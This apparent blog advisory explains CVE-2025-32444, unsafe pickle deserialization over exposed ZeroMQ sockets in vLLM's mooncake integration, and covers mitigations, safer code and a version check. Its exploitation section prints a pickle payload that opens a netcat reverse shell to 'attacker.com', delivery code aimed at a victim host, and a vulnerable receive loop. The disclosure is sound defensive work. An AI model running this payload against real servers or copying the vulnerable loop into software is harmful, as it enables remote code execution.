A new security vulnerability, CVE-2025-32444, impacts certain versions of vLLM, a popular high-throughput and memory-efficient inference and serving engine for large language models (LLMs). The issue specifically affects vLLM instances that use the mooncake integration, from version 0.6.5 up to, but not including, 0.8.5. The vulnerability arises from insecure use of Python’s pickle serialization protocol over *unsecured* ZeroMQ sockets.
This post will explain what happened, how it can be exploited, and how to protect your vLLM deployments.
What is the Vulnerability?
The bug comes from serializing data structures with Python’s pickle module and sending them over ZeroMQ sockets that listen on all network interfaces and are not secured. Pickle is powerful but dangerous: deserializing a pickle can construct arbitrary Python objects and call arbitrary callables, so unpickling untrusted input can lead to code execution.
In the affected vLLM/mooncake integration, ZeroMQ sockets are created that accept external connections and transport pickled objects. If an attacker can connect to these sockets, they can send a specially crafted pickle payload to execute code on the vLLM server.
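To make the mechanism concrete, here is a minimal, benign sketch of why unpickling is equivalent to running code, together with the "restrict globals" pattern described in the Python documentation. The names `CallsOnLoad`, `NoGlobalsUnpickler`, and `restricted_loads` are illustrative and are not taken from vLLM or mooncake. Restricting globals narrows the attack surface but is not a substitute for keeping untrusted peers away from the socket.

```python
import io
import pickle


class CallsOnLoad:
    """Benign stand-in for a crafted object: unpickling it calls len("abc")."""

    def __reduce__(self):
        # pickle stores "call len with ('abc',)" and replays that call on load
        return (len, ("abc",))


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global (class or function)."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but only plain containers and scalars can load."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


blob = pickle.dumps(CallsOnLoad())

# The callable runs during loading; the result is its return value,
# not a CallsOnLoad instance.
result = pickle.loads(blob)

try:
    restricted_loads(blob)
    blocked = False
except pickle.UnpicklingError:
    blocked = True

# Plain data needs no globals, so it still loads.
plain = restricted_loads(pickle.dumps({"k": [1, 2, 3]}))
```

In this sketch the callable is the harmless `len`; an attacker would substitute something like `os.system`, which is why the receiving side must never call `pickle.loads` on bytes from an untrusted peer.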
Exploitation Details
If an attacker can reach a vulnerable vLLM instance’s ZeroMQ socket, they can achieve remote code execution (RCE). Here’s a high-level walk-through.
1. Craft a Malicious Pickle Payload
The attacker creates a Python pickle that runs their chosen code during deserialization.
Example: reverse shell payload
    import os
    import pickle

    class Exploit(object):
        def __reduce__(self):
            return (os.system, ('nc attacker.com 4444 -e /bin/sh',))

    payload = pickle.dumps(Exploit())
2. Deliver Payload to Exposed Socket
The attacker connects to the open ZeroMQ socket (exposed to the network) and sends the payload. Example delivery using pyzmq:
    import zmq

    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://victim_ip:vulnerable_port")
    socket.send(payload)
    # Normally receive response, but the code has now executed
3. Command Execution
When the vLLM mooncake server deserializes the pickle, it executes the attacker’s command (for example, opening a reverse shell or running malware) with the privileges of the vLLM process.
Vulnerable code example
    import pickle
    import zmq

    context = zmq.Context()
    socket = context.socket(zmq.REP)
    socket.bind("tcp://0.0.0.0:12345")  # Exposed on all interfaces

    while True:
        message = socket.recv()
        # UNSAFE deserialization!
        obj = pickle.loads(message)
        # ... process obj
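For contrast, the following is a hedged sketch of a safer receive loop for the same pattern. It is not the actual vLLM patch. It assumes the messages can be expressed as JSON, binds to the loopback interface only, and validates the shape of each message before use. The schema (`request_id`, `op`), the port, and the function names are hypothetical.

```python
import json

ALLOWED_KEYS = {"request_id", "op"}  # hypothetical message schema


def decode_message(raw: bytes) -> dict:
    """Parse a JSON message and reject anything outside the expected shape."""
    try:
        obj = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("message is not valid UTF-8 JSON") from exc
    if not isinstance(obj, dict) or set(obj) != ALLOWED_KEYS:
        raise ValueError("unexpected message shape")
    return obj


def serve(port: int = 12345) -> None:
    """Reply loop that never unpickles; requires pyzmq to be installed."""
    import zmq  # imported lazily so decode_message works without pyzmq

    context = zmq.Context()
    socket = context.socket(zmq.REP)
    socket.bind(f"tcp://127.0.0.1:{port}")  # loopback only, not all interfaces
    while True:
        try:
            obj = decode_message(socket.recv())
            reply = {"ok": True, "request_id": obj["request_id"]}
        except ValueError as exc:
            reply = {"ok": False, "error": str(exc)}
        socket.send(json.dumps(reply).encode("utf-8"))
```

JSON can only produce dictionaries, lists, strings, numbers, booleans, and null, so parsing it cannot trigger a call into arbitrary code the way `pickle.loads` can. If the socket must be reachable from other hosts, restrict access at the network layer and consider ZeroMQ's built-in authentication and encryption mechanisms as well.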
Patch Now: Upgrade to vLLM version 0.8.5 or later
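A quick way to check an environment is to compare the installed vLLM version against the affected range stated in this post (0.6.5 up to, but not including, 0.8.5). The sketch below is illustrative: the helper names are hypothetical, the parser only looks at the leading `major.minor.patch` digits, and a version inside the range is only exposed if the mooncake integration is actually in use.

```python
import re
from importlib import metadata

FIRST_AFFECTED = (0, 6, 5)  # first affected release, per this post
FIRST_FIXED = (0, 8, 5)     # first fixed release, per this post


def is_affected(version: str) -> bool:
    """Return True if the version falls in [0.6.5, 0.8.5)."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    release = tuple(int(part) for part in match.groups())
    # Suffixes such as ".post1" or "rc1" are ignored; treat results for
    # pre-releases of 0.8.5 with caution.
    return FIRST_AFFECTED <= release < FIRST_FIXED


def installed_vllm_version():
    """Return the installed vLLM version string, or None if not installed."""
    try:
        return metadata.version("vllm")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    version = installed_vllm_version()
    if version is None:
        print("vLLM is not installed in this environment")
    elif is_affected(version):
        print(f"vLLM {version} is in the affected range; upgrade to 0.8.5 or later")
    else:
        print(f"vLLM {version} is outside the affected range")
```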
Conclusion
CVE-2025-32444 is a serious vulnerability in vLLM’s mooncake integration caused by unsafe pickle usage over unauthenticated sockets open to external access. If you use vLLM with mooncake on affected versions, patch immediately by updating to v0.8.5 or newer. Never trust pickle over the network, especially on externally reachable sockets.
Always audit server configurations and update your dependencies regularly.
If you run vLLM, check your version and integration settings now, and spread the word in your team. Stay safe!
Timeline
Published on: 04/30/2025 01:15:51 UTC
Last modified on: 05/28/2025 19:12:58 UTC